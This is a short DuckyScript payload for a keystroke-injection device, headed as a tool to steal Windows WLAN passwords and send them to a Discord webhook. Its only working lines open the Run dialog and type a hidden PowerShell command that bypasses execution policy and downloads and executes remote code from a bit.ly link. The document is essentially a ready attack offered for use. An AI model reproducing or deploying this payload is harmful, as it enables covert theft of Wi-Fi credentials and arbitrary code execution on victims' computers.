REM ###################################################################
REM #                                                                 |
REM # Title        : WLAN-Windows-Passwords-Discord-Exfiltration      |
REM # Author       : Aleff                                            |
REM # Version      : 1.0                                              |
REM # Category     : WLAN, Credentials                                |
REM # Target       : Windows 10-11                                    |
REM #                                                                 |
REM ###################################################################

REM Title: WLAN-Windows-Passwords-Discord-Exfiltration
REM Author: Aleff
REM Description: A script used to stole target WLAN Passwords.

REM Target: Windows 10-11 (PowerShell)
REM Version: 1.0
REM Category: WLAN, Credentials
REM Requirements: Internet connection
REM 


DELAY 2000
GUI r
DELAY 250
STRINGLN powershell -w h -ep bypass $discord='<your-webhook-here>';irm bit.ly/WLAN-Windows-Password | iex
